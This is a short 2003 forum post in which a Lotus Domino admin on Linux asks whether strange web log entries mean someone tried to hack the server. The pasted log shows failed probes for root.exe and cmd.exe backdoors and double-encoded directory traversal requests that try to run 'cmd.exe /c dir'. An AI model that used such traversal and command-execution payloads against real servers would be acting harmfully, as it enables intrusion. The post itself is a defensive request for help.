Hello All, I receive a sort of "strange" logging on our Domino Web server. The log does not look the same as when a user logons to check his e-mail. It seems like someone was trying to run a WinNT command on our server, which is running Linux. Was someone really trying to "hack" the server? A partial log is listed for you to exam. I really appreciate if anyone could provide a clue. To protect the privacy for the user who could be trying to hack the server, I have replace the host ID to xxx. Thanks. Date: 12/15/2003 04:04:56 PM User Address: 67.167.218.xxx Authenticated User: - Status: 404 Content Length: 159 Content Type: text/html Request: GET /scripts/root.exe?/c+dir HTTP/1.0 Browser Used: Error: Referring URL: Server Address: www Elapse Time (ms): 1 Translated URI: /local/notesdata/domino/html/scripts/root.exe Cookie: Date: 12/15/2003 04:04:57 PM User Address: 67.167.218.xxx Authenticated User: - Status: 404 Content Length: 159 Content Type: text/html Request: GET /MSADC/root.exe?/c+dir HTTP/1.0 Browser Used: Error: Referring URL: Server Address: www Elapse Time (ms): 1 Translated URI: /local/notesdata/domino/html/MSADC/root.exe Cookie: Date: 12/15/2003 04:04:59 PM User Address: 67.167.218.xxx Authenticated User: - Status: 404 Content Length: 159 Content Type: text/html Request: GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 Browser Used: Error: Referring URL: Server Address: www Elapse Time (ms): 1 Translated URI: /local/notesdata/domino/html/c/winnt/system32/cmd.exe Cookie: Date: 12/15/2003 04:05:01 PM User Address: 67.167.218.xxx Authenticated User: - Status: 404 Content Length: 159 Content Type: text/html Request: GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 Browser Used: Error: Referring URL: Server Address: www Elapse Time (ms): 1 Translated URI: /local/notesdata/domino/html/d/winnt/system32/cmd.exe Cookie: Date: 12/15/2003 04:05:03 PM User Address: 67.167.218.xxx Authenticated User: - Status: 400 Content Length: 171 Content Type: text/html Request: GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Browser Used: Error: Referring URL: Server Address: www Elapse Time (ms): 0 Translated URI: Cookie: Date: 12/15/2003 04:05:05 PM User Address: 67.167.218.xxx Authenticated User: - Status: 400 Content Length: 171 Content Type: text/html Request: GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Browser Used: Error: Referring URL: Server Address: www Elapse Time (ms): 1 Translated URI: Cookie: Date: 12/15/2003 04:05:05 PM User Address: 67.167.218.xxx Authenticated User: - Status: 400 Content Length: 171 Content Type: text/html Request: GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Browser Used: Error: Referring URL: Server Address: www Elapse Time (ms): 0 Translated URI: Cookie:
Go back